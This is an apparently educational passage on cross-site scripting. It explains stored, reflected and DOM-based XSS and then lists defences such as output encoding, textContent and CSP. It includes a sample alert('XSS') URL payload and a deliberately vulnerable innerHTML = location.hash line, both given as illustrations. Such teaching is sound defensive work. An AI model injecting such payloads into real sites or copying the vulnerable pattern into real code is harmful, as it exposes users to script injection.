1. Stored XSS

The malicious script is permanently stored on the server.

Examples:

• Blog comments
• User profiles
• Forum posts
• Product reviews

When other users view the content, the script executes automatically.

Example Flow

• Attacker submits malicious script.
• Application stores it in the database.
• User visits the page.
• Browser executes the script.

2. Reflected XSS

The malicious payload is included in a URL or request and immediately reflected back to the user.

Example: https://example.com/search?q=<script>alert('XSS')</script>

If the application displays the search term without encoding it, the script executes.

3. DOM-Based XSS

The vulnerability exists in client-side JavaScript.

Example: document.getElementById('result').innerHTML = location.hash;

If an attacker controls the URL fragment, malicious code may be injected into the page.

1. Validate User Input

Accept only expected input formats.

Examples:

• Email addresses
• Phone numbers
• Numeric values

2. Encode Output

Convert dangerous characters before displaying user data.

Example <script> becomes &lt;script&gt;

3. Avoid innerHTML

Instead of: element.innerHTML = userInput;

Use: element.textContent = userInput;

4. Implement Content Security Policy (CSP)

A CSP helps restrict which scripts can execute on a page.

5. Use Secure Frameworks

Modern frameworks provide built-in protections:

• React
• Angular
• Vue.js

However, unsafe coding practices can still introduce vulnerabilities.